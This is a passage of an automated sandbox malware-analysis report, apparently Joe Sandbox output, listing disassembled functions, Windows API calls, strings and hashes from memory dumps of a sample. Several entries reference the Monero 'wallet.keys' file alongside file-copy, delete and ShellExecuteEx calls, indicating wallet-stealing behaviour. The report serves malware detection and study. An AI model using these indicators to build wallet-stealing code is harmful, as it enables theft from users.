Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

ShellExecuteEx.SHELL32(0000003C), ref: 008A6726
ExitProcess.KERNEL32 ref: 008A6755

Strings

<, xrefs: 008A66D9

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 2d3e8e598a16e8087fefdc22e5c075b67ff8fb7cab9646a05a46f5367106c86b
Instruction ID: 826382bf6358c6a054ae5874d34a860879fb05f72517569f9a6909b3ccda5448
Opcode Fuzzy Hash: 2d3e8e598a16e8087fefdc22e5c075b67ff8fb7cab9646a05a46f5367106c86b
Instruction Fuzzy Hash: 6B314DB1C01218ABEB58EB94DC81BDE7B78FF14300F404199F20AA6591DF746B49CF66

Function 008A87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008B0E28,00000000,?), ref: 008A882F
RtlAllocateHeap.NTDLL(00000000), ref: 008A8836
wsprintfA.USER32 ref: 008A8850

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Strings

%dx%d, xrefs: 008A8847

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: 6b4e3bd94ee5f477edb41fda674c191acbacd4f5cc01b9036a53fca52cc02156
Instruction ID: 19e6201027117bb4dc7278f025b4b2e8dfb59ca51cc79126fd11134d7aca922f
Opcode Fuzzy Hash: 6b4e3bd94ee5f477edb41fda674c191acbacd4f5cc01b9036a53fca52cc02156
Instruction Fuzzy Hash: 6B21FEB1A41208EFDB04DFD4DD45FAEBBB8FB49B11F104159FA06E7680C77999018BA1

Function 6C69E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C69E577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E584
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C69E8A6

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C69E5A1, 6C69E5CC, 6C69E5FF, 6C69E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C69E722, 6C69E750, 6C69E7A2
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C69E655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C69E826, 6C69E850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C69E777

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction ID: 8c3d27a3f7cef48c4ed5c2157a3c3fed9863bba23175123dc71420e2c82529b7
Opcode Fuzzy Hash: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction Fuzzy Hash: 4111AD31A04258DFCB009F16C888B6ABBB4FFC9329F050A19E84587651D774B805CFDE

Function 008A8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,008A951E,00000000), ref: 008A8D5B
RtlAllocateHeap.NTDLL(00000000), ref: 008A8D62
wsprintfW.USER32 ref: 008A8D78

Strings

%hs, xrefs: 008A8D6F

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 1de8b8051e466e157458e6709848ab843546f7a8f52f3eeb10c7ea148228ca2e
Instruction ID: 6447bee7a96904001e8e085bd6f141eb5155f90b3ad7f7a511c0cde317460eb4
Opcode Fuzzy Hash: 1de8b8051e466e157458e6709848ab843546f7a8f52f3eeb10c7ea148228ca2e
Instruction Fuzzy Hash: A4E08CB1A41208BBC700DFD4DC0AE6D77B8EB44702F000095FD0AC7380DA719E019B92

Function 6C6A0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0CD5

Part of subcall function 6C68F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C68F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0D40
free.MOZGLUE ref: 6C6A0DCB

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

free.MOZGLUE ref: 6C6A0DDD
free.MOZGLUE ref: 6C6A0DF2

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction ID: 0744bd5b5f7c2c126cec454ca987b28fa44c9ec751ffde8c5b25c6819782081d
Opcode Fuzzy Hash: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction Fuzzy Hash: 154139719087809BD320DF29C08079AFBE5BFC9714F118A2EE9D987750D770A846CB9B

Function 6C6ACCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDA4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD158
Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000098,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDC4

Part of subcall function 6C6A7480: ReleaseSRWLockExclusive.KERNEL32(?,6C6B15FC,?,?,?,?,6C6B15FC,?), ref: 6C6A74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACECC

Part of subcall function 6C66CA10: mozalloc_abort.MOZGLUE(?), ref: 6C66CAA2

Part of subcall function 6C69CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C6ACEEA,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000), ref: 6C69CB57
Part of subcall function 6C69CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C69CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C6ACEEA,?,?), ref: 6C69CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD058

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction ID: 7f1d13926e85e4132c53c4f335a1232c33e1e35778ffcb01c90bc5c865becd05
Opcode Fuzzy Hash: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction Fuzzy Hash: 2FD16F71A04B469FD708CF28C480B99F7E1BF89308F01866DD95987712EB31B9A6CBC5

Function 0089D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A8B60: GetSystemTime.KERNEL32(008B0E1A,0156A038,008B05AE,?,?,008913F9,?,0000001A,008B0E1A,00000000,?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008A8B86

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0089D481
lstrlen.KERNEL32(00000000), ref: 0089D698
lstrlen.KERNEL32(00000000), ref: 0089D6AC
DeleteFileA.KERNEL32(00000000), ref: 0089D72B

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 2b188451f148be3f0223f2f582d7a1ed8a161e9f8d1448a21ad245d1dbfc33ed
Instruction ID: e367c5349583af839e61fdeb309a84723bdae773c657d4e69e2d7daecae4112b
Opcode Fuzzy Hash: 2b188451f148be3f0223f2f582d7a1ed8a161e9f8d1448a21ad245d1dbfc33ed
Instruction Fuzzy Hash: AA91DF729101049AEB48FBA8DC96DEE7338FF15300F544169F517E6991EF386A09CB63

Function 6C675C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C675D40
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C675D67
__aulldiv.LIBCMT ref: 6C675DB4
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C675DED

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction ID: d33b4dba655bb99291579b5ea7e7ad6204471695016f9aad492d62ec9b1b7e3c
Opcode Fuzzy Hash: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction Fuzzy Hash: 89518F71E001698FCF08CF69C994AAEBBF1FB85304F198A5DD811A7B50C7307945CB99

Function 6C65CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C65CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C65CF4E

Strings

0, xrefs: 6C65CF30

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 196597a6bdbc8dad2df6b501d6b72384db2d0378a8bf5e5c92be4be767be814e
Instruction ID: e54310c26906e80553e8d3bb2d46e827d1f78c5d19c18f1187dfef5d907545ba
Opcode Fuzzy Hash: 196597a6bdbc8dad2df6b501d6b72384db2d0378a8bf5e5c92be4be767be814e
Instruction Fuzzy Hash: 9D511475A002568FCB00CF18C890A9AFBB5EF99300F29859DD95A5F351D731ED16CBE0

Function 008A3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
